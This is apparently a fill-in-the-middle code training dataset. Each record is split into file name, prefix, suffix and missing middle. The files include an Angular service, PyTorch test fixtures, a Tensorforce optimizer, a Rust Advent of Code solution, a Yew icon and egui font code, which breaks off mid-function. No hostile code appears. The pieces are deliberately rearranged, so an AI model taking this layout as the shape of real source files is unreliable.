this.crisis$ = this.route.paramMap.pipe(
switchMap(params => {
this.selectedId = +params.get('id');
return this.service.getCrisises();
})
);
}
}
| CrisisListComponent |
conftest.py | r"""Setup fixtures for testing :py:class:`lmp.model.LSTMModel`."""
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
tknzr: BaseTknzr,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_pre_hid_lyr: int,
n_post_hid_lyr: int,
p_emb: float,
p_hid: float,
) -> LSTMModel:
r"""Example ``LSTMModel`` instance."""
return LSTMModel(
d_emb=d_emb,
d_hid=d_hid,
n_hid_lyr=n_hid_lyr,
n_pre_hid_lyr=n_pre_hid_lyr,
n_post_hid_lyr=n_post_hid_lyr,
p_emb=p_emb,
p_hid=p_hid,
tknzr=tknzr,
)
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
|
@pytest.fixture
def batch_next_tkids(
lstm_model: LSTMModel,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
r"""Example target batch of token ids."""
# Same shape as `batch_prev_tkids`.
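    # Reuse every position except the last and append one fresh random token id, so only the final position can differ.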
return torch.cat(
[
batch_prev_tkids[..., :-1],
torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(batch_prev_tkids.shape[0], 1),
),
],
dim=1,
)
| r"""Example input batch of token ids."""
# Shape: (2, 3).
return torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(2, 3),
) |
optimizer.py | # Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import TensorforceError, util
from tensorforce.core import Module
class Optimizer(Module):
"""
    Base class for optimizers, which minimize a (not yet further specified) expression, usually
    some kind of loss function. More generally, an optimizer can be considered a method of
    updating a set of variables.
"""
def __init__(self, name, summary_labels=None):
super().__init__(name=name, l2_regularization=0.0, summary_labels=summary_labels)
def tf_step(self, variables, **kwargs):
|
def tf_apply_step(self, variables, deltas):
"""
Applies the given (and already calculated) step deltas to the variable values.
Args:
variables: List of variables.
deltas: List of deltas of same length.
Returns:
The step-applied operation. A tf.group of tf.assign_add ops.
"""
if len(variables) != len(deltas):
raise TensorforceError("Invalid variables and deltas lists.")
assignments = list()
for variable, delta in zip(variables, deltas):
assignments.append(tf.assign_add(ref=variable, value=delta))
with tf.control_dependencies(control_inputs=assignments):
return util.no_operation()
def tf_minimize(self, variables, **kwargs):
"""
Performs an optimization step.
Args:
variables: List of variables to optimize.
**kwargs: Additional optimizer-specific arguments. The following arguments are used
by some optimizers:
- arguments: Dict of arguments for callables, like fn_loss.
- fn_loss: A callable returning the loss of the current model.
- fn_reference: A callable returning the reference values, in case of a comparative
loss.
- fn_kl_divergence: A callable returning the KL-divergence relative to the
current model.
- sampled_loss: A sampled loss (integer).
- return_estimated_improvement: Returns the estimated improvement resulting from
the natural gradient calculation if true.
- source_variables: List of source variables to synchronize with.
- global_variables: List of global variables to apply the proposed optimization
step to.
Returns:
The optimization operation.
"""
deltas = self.step(variables=variables, **kwargs)
for n in range(len(variables)):
name = variables[n].name
if name[-2:] != ':0':
raise TensorforceError.unexpected()
deltas[n] = self.add_summary(
label=('updates', 'updates-full'), name=(name[:-2] + '-update'), tensor=deltas[n],
mean_variance=True
)
deltas[n] = self.add_summary(
label='updates-full', name=(name[:-2] + '-update'), tensor=deltas[n]
)
with tf.control_dependencies(control_inputs=deltas):
return util.no_operation()
def add_variable(self, name, dtype, shape, is_trainable=False, initializer='zeros'):
if is_trainable:
raise TensorforceError("Invalid trainable variable.")
return super().add_variable(
name=name, dtype=dtype, shape=shape, is_trainable=is_trainable, initializer=initializer
)
| """
Creates the TensorFlow operations for performing an optimization step on the given
variables, including actually changing the values of the variables.
Args:
variables: List of variables to optimize.
**kwargs: Additional arguments depending on the specific optimizer implementation.
For instance, often includes `fn_loss` if a loss function is optimized.
Returns:
List of delta tensors corresponding to the updates for each optimized variable.
"""
raise NotImplementedError |
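        # A minimal sketch (not part of Tensorforce itself) of what a concrete subclass might
        # implement here, assuming TF1-style `tf.gradients` and a `fn_loss` callable as described
        # in `tf_minimize`; the class name `GradientDescentSketch` and the `learning_rate`
        # argument are hypothetical.
        #
        #     class GradientDescentSketch(Optimizer):
        #         def __init__(self, name, learning_rate, summary_labels=None):
        #             super().__init__(name=name, summary_labels=summary_labels)
        #             self.learning_rate = learning_rate
        #
        #         def tf_step(self, variables, arguments, fn_loss, **kwargs):
        #             loss = fn_loss(**arguments)
        #             gradients = tf.gradients(ys=loss, xs=variables)
        #             deltas = [-self.learning_rate * grad for grad in gradients]
        #             # Apply the deltas (tf_apply_step is assumed to be exposed as apply_step,
        #             # following the same pattern by which tf_step is called as self.step in
        #             # tf_minimize above) and return them, as the contract above requires.
        #             applied = self.apply_step(variables=variables, deltas=deltas)
        #             with tf.control_dependencies(control_inputs=(applied,)):
        #                 return [tf.identity(delta) for delta in deltas]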
dummy.service.ts | import { Inject, Injectable } from '@angular/core';
import {HttpClient, HttpHeaders} from '@angular/common/http'
import {USER} from '../model/user'
import { Observable } from 'rxjs';
@Injectable({
providedIn: 'root'
})
export class DummyService {
url: string = 'http://5.252.224.199:3000/';
constructor(private httpclient: HttpClient) {
this.url = "http://5.252.224.199:3000/api";
}
postUser(user: USER): Observable<USER> {
console.log("send post request");
return this.httpclient.post<USER>(this.url,user);
}
deleteUser(id: string | undefined) { | getAllUser(): Observable<USER[]>{
console.log("send get request");
return this.httpclient.get<USER[]>(this.url);
}
} | return this.httpclient.delete(this.url + "/" + id);
}
|
day23.rs | use aoc::{CustomError, Result};
use std::fmt;
use std::ops::{Add, Sub};
use std::str::FromStr;
use lazy_static::lazy_static;
use regex::Regex;
fn main() -> Result<()> {
let s = aoc::read_input()?;
part1(&s)?;
part2(&s)?;
Ok(())
}
fn | (s: &str) -> Result<usize> {
let bots: std::result::Result<Vec<_>, _> =
s.lines().map(|s| s.parse::<Bot>()).collect();
let bots = bots?;
let max = bots.iter().max_by_key(|b| b.radius);
#[cfg(test)]
eprintln!("Bots, {:?}", bots);
if let Some(bot) = max {
eprintln!("Largest {:?}", bot);
let bots_in_range = bots
.iter()
.map(|b| manhattan_distance(bot.pos, b.pos))
.filter(|d| *d <= bot.radius as usize)
.count();
eprintln!("part1: Bots in range {:?}", bots_in_range);
return Ok(bots_in_range);
}
Ok(0)
}
fn part2(s: &str) -> Result<usize> {
let bots: std::result::Result<Vec<_>, _> =
s.lines().map(|s| s.parse::<Bot>()).collect();
let bots = bots?;
#[cfg(test)]
eprintln!("Bots, {:?}", bots);
let min_x = bots.iter().map(|b| b.pos.x).min().unwrap();
let min_y = bots.iter().map(|b| b.pos.y).min().unwrap();
let min_z = bots.iter().map(|b| b.pos.z).min().unwrap();
let max_x = bots.iter().map(|b| b.pos.x).max().unwrap();
let max_y = bots.iter().map(|b| b.pos.y).max().unwrap();
let max_z = bots.iter().map(|b| b.pos.z).max().unwrap();
eprintln!("Min {:?}", (min_x, min_y, min_z));
eprintln!("Max {:?}", (max_x, max_y, max_z));
let tmp = [max_x - min_x, max_y - min_y, max_z - min_z];
let max_size = *tmp.into_iter().max().unwrap();
let mut size = 1;
while size < max_size {
size *= 2;
}
eprintln!("Max size {:?} -> size {}", max_size, size);
let mut spaces = vec![Space {
nr_bots: bots.len(),
pos: (min_x, min_y, min_z).into(),
size,
}];
use std::cmp::Ordering;
while !spaces.is_empty() {
spaces.sort_by(|a, b| match a.nr_bots.cmp(&b.nr_bots) {
Ordering::Equal => match a.dist().cmp(&b.dist()).reverse() {
Ordering::Equal => a.size.cmp(&b.size).reverse(),
other => other,
},
other => other,
});
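        // pop() takes the most promising cube: the one covering the most bots, breaking ties by
        // distance to the origin (closest first) and then by cube size (smallest first).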
let current = spaces.pop().unwrap();
if current.size == 1 {
eprintln!("Found {:?}", current);
eprintln!("Part2: {:?}", current.dist());
return Ok(current.dist());
}
let ns = current.size / 2;
let s1 = {
let mut s = Space::at(current.pos + (0, 0, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s2 = {
let mut s = Space::at(current.pos + (ns, 0, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s3 = {
let mut s = Space::at(current.pos + (0, ns, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s4 = {
let mut s = Space::at(current.pos + (0, 0, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s5 = {
let mut s = Space::at(current.pos + (ns, ns, 0), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s6 = {
let mut s = Space::at(current.pos + (0, ns, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s7 = {
let mut s = Space::at(current.pos + (ns, 0, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
let s8 = {
let mut s = Space::at(current.pos + (ns, ns, ns), ns);
s.nr_bots = bots.iter().filter(|b| b.in_range(s)).count();
s
};
if s1.nr_bots > 0 {
spaces.push(s1);
}
if s2.nr_bots > 0 {
spaces.push(s2);
}
if s3.nr_bots > 0 {
spaces.push(s3);
}
if s4.nr_bots > 0 {
spaces.push(s4);
}
if s5.nr_bots > 0 {
spaces.push(s5);
}
if s6.nr_bots > 0 {
spaces.push(s6);
}
if s7.nr_bots > 0 {
spaces.push(s7);
}
if s8.nr_bots > 0 {
spaces.push(s8);
}
}
Ok(0)
}
fn manhattan_distance(a: V3, b: V3) -> usize {
((b.x - a.x).abs() + (b.y - a.y).abs() + (b.z - a.z).abs()) as usize
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
struct Space {
nr_bots: usize,
/// lower left corner
pos: V3,
size: i64,
}
impl Space {
pub fn at(pos: V3, size: i64) -> Self {
Space {
nr_bots: 0,
pos,
size,
}
}
pub fn dist(&self) -> usize {
manhattan_distance(self.pos, V3 { x: 0, y: 0, z: 0 })
}
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
struct Bot {
pos: V3,
radius: i64,
}
impl Bot {
fn in_range(&self, space: Space) -> bool {
let min = space.pos;
let max = space.pos + (space.size - 1, space.size - 1, space.size - 1);
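        // Accumulate the Manhattan distance from the bot to the nearest point of the axis-aligned cube [min, max].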
let mut d = 0;
if self.pos.x > max.x {
d += (self.pos.x - max.x).abs() as i64
}
if self.pos.x < min.x {
d += (min.x - self.pos.x).abs() as i64
}
if self.pos.y > max.y {
d += (self.pos.y - max.y).abs() as i64
}
if self.pos.y < min.y {
d += (min.y - self.pos.y).abs() as i64
}
if self.pos.z > max.z {
d += (self.pos.z - max.z).abs() as i64
}
if self.pos.z < min.z {
d += (min.z - self.pos.z).abs() as i64
}
d <= self.radius
}
}
impl FromStr for Bot {
type Err = CustomError;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
lazy_static! {
// pos=<0,0,0>, r=4
static ref RE: Regex = Regex::new(r"pos=<([\d\-]+),([\d\-]+),([\d\-]+)>, r=(\d+)").unwrap();
}
let caps = RE
.captures(s)
.ok_or_else(|| CustomError("Invalid captures".to_owned()))?;
let x = aoc::get_value(&caps, 1)?;
let y = aoc::get_value(&caps, 2)?;
let z = aoc::get_value(&caps, 3)?;
let r = aoc::get_value(&caps, 4)?;
Ok(Bot {
pos: V3 { x, y, z },
radius: r,
})
}
}
#[derive(Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd, Default)]
pub struct V3 {
pub x: i64,
pub y: i64,
pub z: i64,
}
impl std::convert::From<(i64, i64, i64)> for V3 {
fn from(v: (i64, i64, i64)) -> Self {
V3 {
x: v.0,
y: v.1,
z: v.2,
}
}
}
impl fmt::Debug for V3 {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "({}, {}, {})", self.x, self.y, self.z)
}
}
impl fmt::Display for V3 {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "{:?}", self)
}
}
macro_rules! impl_ops {
($tp: ty, $p: pat => $x:expr, $y:expr, $z:expr) => {
impl Add<$tp> for V3 {
type Output = V3;
fn add(self, $p: $tp) -> Self::Output {
V3 {
x: self.x + $x,
y: self.y + $y,
z: self.z + $z,
}
}
}
impl Sub<$tp> for V3 {
type Output = V3;
fn sub(self, $p: $tp) -> Self::Output {
V3 {
x: self.x - $x,
y: self.y - $y,
z: self.z - $z,
}
}
}
};
}
impl_ops!(V3, p => p.x, p.y, p.z);
impl_ops!((i64, i64, i64), p => p.0, p.1, p.2);
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn part1_example_input() {
let input = r"
pos=<0,0,0>, r=4
pos=<1,0,0>, r=1
pos=<4,0,0>, r=3
pos=<0,2,0>, r=1
pos=<0,5,0>, r=3
pos=<0,0,3>, r=1
pos=<1,1,1>, r=1
pos=<1,1,2>, r=1
pos=<1,3,1>, r=1
";
assert_eq!(7, part1(input.trim()).unwrap());
}
#[test]
fn part2_example_input() {
let input = r"
pos=<10,12,12>, r=2
pos=<12,14,12>, r=2
pos=<16,12,12>, r=4
pos=<14,14,14>, r=6
pos=<50,50,50>, r=200
pos=<10,10,10>, r=5
";
assert_eq!(36, part2(input.trim()).unwrap());
}
}
| part1 |
icon_pinch.rs |
pub struct IconPinch {
props: crate::Props,
}
impl yew::Component for IconPinch {
type Properties = crate::Props;
type Message = ();
fn create(props: Self::Properties, _: yew::prelude::ComponentLink<Self>) -> Self
{
Self { props }
}
fn | (&mut self, _: Self::Message) -> yew::prelude::ShouldRender
{
true
}
fn change(&mut self, _: Self::Properties) -> yew::prelude::ShouldRender
{
false
}
fn view(&self) -> yew::prelude::Html
{
yew::prelude::html! {
<svg
class=self.props.class.unwrap_or("")
width=self.props.size.unwrap_or(24).to_string()
height=self.props.size.unwrap_or(24).to_string()
viewBox="0 0 24 24"
fill=self.props.fill.unwrap_or("none")
stroke=self.props.color.unwrap_or("currentColor")
stroke-width=self.props.stroke_width.unwrap_or(2).to_string()
stroke-linecap=self.props.stroke_linecap.unwrap_or("round")
stroke-linejoin=self.props.stroke_linejoin.unwrap_or("round")
>
<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><g><rect fill="none" height="24" width="24"/></g><g><path d="M23.18,15.4L22.1,23h-9L8,17.62l1.22-1.23L13,17.24V6.5C13,5.67,13.67,5,14.5,5S16,5.67,16,6.5v6h1.38L23.18,15.4z M6,2.5 V1h5v5H9.5V3.56L3.56,9.5H6V11H1V6h1.5v2.44L8.44,2.5H6z"/></g></svg>
</svg>
}
}
}
| update |
test_common_base_transport.py | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestCommonBaseTransport(unittest.TestCase):
def test_export_abstract(self):
|
def test_flush_abstract_and_optional(self):
from opencensus.common.transports import base
transport = base.Transport()
transport.flush()
| from opencensus.common.transports import base
transport = base.Transport()
trace = {}
with self.assertRaises(NotImplementedError):
transport.export(trace) |
fonts.rs | use std::collections::BTreeMap;
use crate::{
mutex::{Arc, Mutex, MutexGuard},
text::{
font::{Font, FontImpl},
Galley, LayoutJob,
},
TextureAtlas,
};
use emath::NumExt as _;
// ----------------------------------------------------------------------------
/// How to select a sized font.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontId {
/// Height in points.
pub size: f32,
/// What font family to use.
pub family: FontFamily,
// TODO: weight (bold), italics, …
}
impl Default for FontId {
#[inline]
fn default() -> Self {
Self {
size: 14.0,
family: FontFamily::Proportional,
}
}
}
impl FontId {
#[inline]
pub fn new(size: f32, family: FontFamily) -> Self {
Self { size, family }
}
#[inline]
pub fn proportional(size: f32) -> Self {
Self::new(size, FontFamily::Proportional)
}
#[inline]
pub fn monospace(size: f32) -> Self {
Self::new(size, FontFamily::Monospace)
}
}
#[allow(clippy::derive_hash_xor_eq)]
impl std::hash::Hash for FontId {
#[inline(always)]
fn hash<H: std::hash::Hasher>(&self, state: &mut H) {
let Self { size, family } = self;
crate::f32_hash(state, *size);
family.hash(state);
}
}
// ----------------------------------------------------------------------------
/// Font of unknown size.
///
/// Which style of font: [`Monospace`][`FontFamily::Monospace`], [`Proportional`][`FontFamily::Proportional`],
/// or by user-chosen name.
#[derive(Clone, Debug, Eq, Hash, Ord, PartialEq, PartialOrd)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub enum FontFamily {
    /// A font where some characters are wider than others (e.g. 'w' is wider than 'i').
///
/// Proportional fonts are easier to read and should be the preferred choice in most situations.
Proportional,
/// A font where each character is the same width (`w` is the same width as `i`).
///
/// Useful for code snippets, or when you need to align numbers or text.
Monospace,
/// One of the names in [`FontDefinitions::families`].
///
/// ```
/// # use epaint::FontFamily;
/// // User-chosen names:
/// FontFamily::Name("arial".into());
/// FontFamily::Name("serif".into());
/// ```
Name(Arc<str>),
}
impl Default for FontFamily {
#[inline]
fn default() -> Self {
FontFamily::Proportional
}
}
impl std::fmt::Display for FontFamily {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Monospace => "Monospace".fmt(f),
Self::Proportional => "Proportional".fmt(f),
Self::Name(name) => (*name).fmt(f),
}
}
}
// ----------------------------------------------------------------------------
/// A `.ttf` or `.otf` file and a font face index.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontData {
/// The content of a `.ttf` or `.otf` file.
pub font: std::borrow::Cow<'static, [u8]>,
/// Which font face in the file to use.
/// When in doubt, use `0`.
pub index: u32,
/// Extra scale and vertical tweak to apply to all text of this font.
pub tweak: FontTweak,
}
impl FontData {
pub fn from_static(font: &'static [u8]) -> Self {
Self {
font: std::borrow::Cow::Borrowed(font),
index: 0,
tweak: Default::default(),
}
}
pub fn from_owned(font: Vec<u8>) -> Self {
Self {
font: std::borrow::Cow::Owned(font),
index: 0,
tweak: Default::default(),
}
}
pub fn tweak(self, tweak: FontTweak) -> Self {
Self { tweak, ..self }
}
}
// ----------------------------------------------------------------------------
/// Extra scale and vertical tweak to apply to all text of a certain font.
#[derive(Copy, Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub struct FontTweak {
/// Scale the font by this much.
///
/// Default: `1.0` (no scaling).
pub scale: f32,
/// Shift font downwards by this fraction of the font size (in points).
///
/// A positive value shifts the text upwards.
/// A negative value shifts it downwards.
///
/// Example value: `-0.2`.
pub y_offset_factor: f32,
/// Shift font downwards by this amount of logical points.
///
/// Example value: `-1.0`.
pub y_offset: f32,
}
impl Default for FontTweak {
fn default() -> Self {
Self {
scale: 1.0,
y_offset_factor: -0.2, // makes the default fonts look more centered in buttons and such
y_offset: 0.0,
}
}
}
// ----------------------------------------------------------------------------
fn ab_glyph_font_from_font_data(name: &str, data: &FontData) -> ab_glyph::FontArc {
match &data.font {
std::borrow::Cow::Borrowed(bytes) => {
ab_glyph::FontRef::try_from_slice_and_index(bytes, data.index)
.map(ab_glyph::FontArc::from)
}
std::borrow::Cow::Owned(bytes) => {
ab_glyph::FontVec::try_from_vec_and_index(bytes.clone(), data.index)
.map(ab_glyph::FontArc::from)
}
}
.unwrap_or_else(|err| panic!("Error parsing {:?} TTF/OTF font file: {}", name, err))
}
/// Describes the font data and the sizes to use.
///
/// Often you would start with [`FontDefinitions::default()`] and then add/change the contents.
///
/// This is how you install your own custom fonts:
/// ```
/// # use {epaint::text::{FontDefinitions, FontFamily, FontData}};
/// # struct FakeEguiCtx {};
/// # impl FakeEguiCtx { fn set_fonts(&self, _: FontDefinitions) {} }
/// # let egui_ctx = FakeEguiCtx {};
/// let mut fonts = FontDefinitions::default();
///
/// // Install my own font (maybe supporting non-latin characters):
/// fonts.font_data.insert("my_font".to_owned(),
/// FontData::from_static(include_bytes!("../../fonts/Ubuntu-Light.ttf"))); // .ttf and .otf supported
///
/// // Put my font first (highest priority):
/// fonts.families.get_mut(&FontFamily::Proportional).unwrap()
/// .insert(0, "my_font".to_owned());
///
/// // Put my font as last fallback for monospace:
/// fonts.families.get_mut(&FontFamily::Monospace).unwrap()
/// .push("my_font".to_owned());
///
/// egui_ctx.set_fonts(fonts);
/// ```
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[cfg_attr(feature = "serde", serde(default))]
pub struct FontDefinitions {
/// List of font names and their definitions.
///
/// `epaint` has built-in-default for these, but you can override them if you like.
pub font_data: BTreeMap<String, FontData>,
| /// Which fonts (names) to use for each [`FontFamily`].
///
/// The list should be a list of keys into [`Self::font_data`].
/// When looking for a character glyph `epaint` will start with
/// the first font and then move to the second, and so on.
/// So the first font is the primary, and then comes a list of fallbacks in order of priority.
// TODO: per font size-modifier.
pub families: BTreeMap<FontFamily, Vec<String>>,
}
impl Default for FontDefinitions {
fn default() -> Self {
#[allow(unused)]
let mut font_data: BTreeMap<String, FontData> = BTreeMap::new();
let mut families = BTreeMap::new();
#[cfg(feature = "default_fonts")]
{
font_data.insert(
"Hack".to_owned(),
FontData::from_static(include_bytes!("../../fonts/Hack-Regular.ttf")),
);
font_data.insert(
"Ubuntu-Light".to_owned(),
FontData::from_static(include_bytes!("../../fonts/Ubuntu-Light.ttf")),
);
// Some good looking emojis. Use as first priority:
font_data.insert(
"NotoEmoji-Regular".to_owned(),
FontData::from_static(include_bytes!("../../fonts/NotoEmoji-Regular.ttf")),
);
// Bigger emojis, and more. <http://jslegers.github.io/emoji-icon-font/>:
font_data.insert(
"emoji-icon-font".to_owned(),
FontData::from_static(include_bytes!("../../fonts/emoji-icon-font.ttf")).tweak(
FontTweak {
scale: 0.8, // make it smaller
y_offset_factor: 0.07, // move it down slightly
y_offset: 0.0,
},
),
);
families.insert(
FontFamily::Monospace,
vec![
"Hack".to_owned(),
"Ubuntu-Light".to_owned(), // fallback for √ etc
"NotoEmoji-Regular".to_owned(),
"emoji-icon-font".to_owned(),
],
);
families.insert(
FontFamily::Proportional,
vec![
"Ubuntu-Light".to_owned(),
"NotoEmoji-Regular".to_owned(),
"emoji-icon-font".to_owned(),
],
);
}
#[cfg(not(feature = "default_fonts"))]
{
families.insert(FontFamily::Monospace, vec![]);
families.insert(FontFamily::Proportional, vec![]);
}
Self {
font_data,
families,
}
}
}
// ----------------------------------------------------------------------------
/// The collection of fonts used by `epaint`.
///
/// Required in order to paint text.
/// Create one and reuse. Cheap to clone.
///
/// You need to call [`Self::begin_frame`] and [`Self::font_image_delta`] once every frame.
///
/// Wrapper for `Arc<Mutex<FontsAndCache>>`.
pub struct Fonts(Arc<Mutex<FontsAndCache>>);
impl Fonts {
/// Create a new [`Fonts`] for text layout.
/// This call is expensive, so only create one [`Fonts`] and then reuse it.
///
/// * `pixels_per_point`: how many physical pixels per logical "point".
/// * `max_texture_side`: largest supported texture size (one side).
pub fn new(
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
) -> Self {
let fonts_and_cache = FontsAndCache {
fonts: FontsImpl::new(pixels_per_point, max_texture_side, definitions),
galley_cache: Default::default(),
};
Self(Arc::new(Mutex::new(fonts_and_cache)))
}
/// Call at the start of each frame with the latest known
/// `pixels_per_point` and `max_texture_side`.
///
/// Call after painting the previous frame, but before using [`Fonts`] for the new frame.
///
/// This function will react to changes in `pixels_per_point` and `max_texture_side`,
/// as well as notice when the font atlas is getting full, and handle that.
pub fn begin_frame(&self, pixels_per_point: f32, max_texture_side: usize) {
let mut fonts_and_cache = self.0.lock();
let pixels_per_point_changed =
(fonts_and_cache.fonts.pixels_per_point - pixels_per_point).abs() > 1e-3;
let max_texture_side_changed = fonts_and_cache.fonts.max_texture_side != max_texture_side;
let font_atlas_almost_full = fonts_and_cache.fonts.atlas.lock().fill_ratio() > 0.8;
let needs_recreate =
pixels_per_point_changed || max_texture_side_changed || font_atlas_almost_full;
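        // Recreating FontsImpl discards the texture atlas and the galley cache, so only do it
        // when something actually changed or the atlas is nearly full.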
if needs_recreate {
let definitions = fonts_and_cache.fonts.definitions.clone();
*fonts_and_cache = FontsAndCache {
fonts: FontsImpl::new(pixels_per_point, max_texture_side, definitions),
galley_cache: Default::default(),
};
}
fonts_and_cache.galley_cache.flush_cache();
}
/// Call at the end of each frame (before painting) to get the change to the font texture since last call.
pub fn font_image_delta(&self) -> Option<crate::ImageDelta> {
self.lock().fonts.atlas.lock().take_delta()
}
/// Access the underlying [`FontsAndCache`].
#[doc(hidden)]
#[inline]
pub fn lock(&self) -> MutexGuard<'_, FontsAndCache> {
self.0.lock()
}
#[inline]
pub fn pixels_per_point(&self) -> f32 {
self.lock().fonts.pixels_per_point
}
#[inline]
pub fn max_texture_side(&self) -> usize {
self.lock().fonts.max_texture_side
}
/// Current size of the font image.
/// Pass this to [`crate::Tessellator`].
pub fn font_image_size(&self) -> [usize; 2] {
self.lock().fonts.atlas.lock().size()
}
/// Width of this character in points.
#[inline]
pub fn glyph_width(&self, font_id: &FontId, c: char) -> f32 {
self.lock().fonts.glyph_width(font_id, c)
}
/// Height of one row of text in points
#[inline]
pub fn row_height(&self, font_id: &FontId) -> f32 {
self.lock().fonts.row_height(font_id)
}
/// List of all known font families.
pub fn families(&self) -> Vec<FontFamily> {
self.lock()
.fonts
.definitions
.families
.keys()
.cloned()
.collect()
}
/// Layout some text.
///
/// This is the most advanced layout function.
/// See also [`Self::layout`], [`Self::layout_no_wrap`] and
/// [`Self::layout_delayed_color`].
///
/// The implementation uses memoization so repeated calls are cheap.
#[inline]
pub fn layout_job(&self, job: LayoutJob) -> Arc<Galley> {
self.lock().layout_job(job)
}
pub fn num_galleys_in_cache(&self) -> usize {
self.lock().galley_cache.num_galleys_in_cache()
}
/// How full is the font atlas?
///
/// This increases as new fonts and/or glyphs are used,
/// but can also decrease in a call to [`Self::begin_frame`].
pub fn font_atlas_fill_ratio(&self) -> f32 {
self.lock().fonts.atlas.lock().fill_ratio()
}
/// Will wrap text at the given width and line break at `\n`.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout(
&self,
text: String,
font_id: FontId,
color: crate::Color32,
wrap_width: f32,
) -> Arc<Galley> {
let job = LayoutJob::simple(text, font_id, color, wrap_width);
self.layout_job(job)
}
/// Will line break at `\n`.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout_no_wrap(
&self,
text: String,
font_id: FontId,
color: crate::Color32,
) -> Arc<Galley> {
let job = LayoutJob::simple(text, font_id, color, f32::INFINITY);
self.layout_job(job)
}
/// Like [`Self::layout`], made for when you want to pick a color for the text later.
///
/// The implementation uses memoization so repeated calls are cheap.
pub fn layout_delayed_color(
&self,
text: String,
font_id: FontId,
wrap_width: f32,
) -> Arc<Galley> {
self.layout_job(LayoutJob::simple(
text,
font_id,
crate::Color32::TEMPORARY_COLOR,
wrap_width,
))
}
}
// ----------------------------------------------------------------------------
pub struct FontsAndCache {
pub fonts: FontsImpl,
galley_cache: GalleyCache,
}
impl FontsAndCache {
fn layout_job(&mut self, job: LayoutJob) -> Arc<Galley> {
self.galley_cache.layout(&mut self.fonts, job)
}
}
// ----------------------------------------------------------------------------
/// The collection of fonts used by `epaint`.
///
/// Required in order to paint text.
pub struct FontsImpl {
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
atlas: Arc<Mutex<TextureAtlas>>,
font_impl_cache: FontImplCache,
sized_family: ahash::AHashMap<(u32, FontFamily), Font>,
}
impl FontsImpl {
/// Create a new [`FontsImpl`] for text layout.
/// This call is expensive, so only create one [`FontsImpl`] and then reuse it.
pub fn new(
pixels_per_point: f32,
max_texture_side: usize,
definitions: FontDefinitions,
) -> Self {
assert!(
0.0 < pixels_per_point && pixels_per_point < 100.0,
"pixels_per_point out of range: {}",
pixels_per_point
);
let texture_width = max_texture_side.at_most(8 * 1024);
let initial_height = 64;
let mut atlas = TextureAtlas::new([texture_width, initial_height]);
{
// Make the top left pixel fully white:
let (pos, image) = atlas.allocate((1, 1));
assert_eq!(pos, (0, 0));
image[pos] = 255;
}
let atlas = Arc::new(Mutex::new(atlas));
let font_impl_cache =
FontImplCache::new(atlas.clone(), pixels_per_point, &definitions.font_data);
Self {
pixels_per_point,
max_texture_side,
definitions,
atlas,
font_impl_cache,
sized_family: Default::default(),
}
}
#[inline(always)]
pub fn pixels_per_point(&self) -> f32 {
self.pixels_per_point
}
#[inline]
pub fn definitions(&self) -> &FontDefinitions {
&self.definitions
}
/// Get the right font implementation from size and [`FontFamily`].
pub fn font(&mut self, font_id: &FontId) -> &mut Font {
let FontId { size, family } = font_id;
let scale_in_pixels = self.font_impl_cache.scale_as_pixels(*size);
self.sized_family
.entry((scale_in_pixels, family.clone()))
.or_insert_with(|| {
let fonts = &self.definitions.families.get(family);
let fonts = fonts.unwrap_or_else(|| {
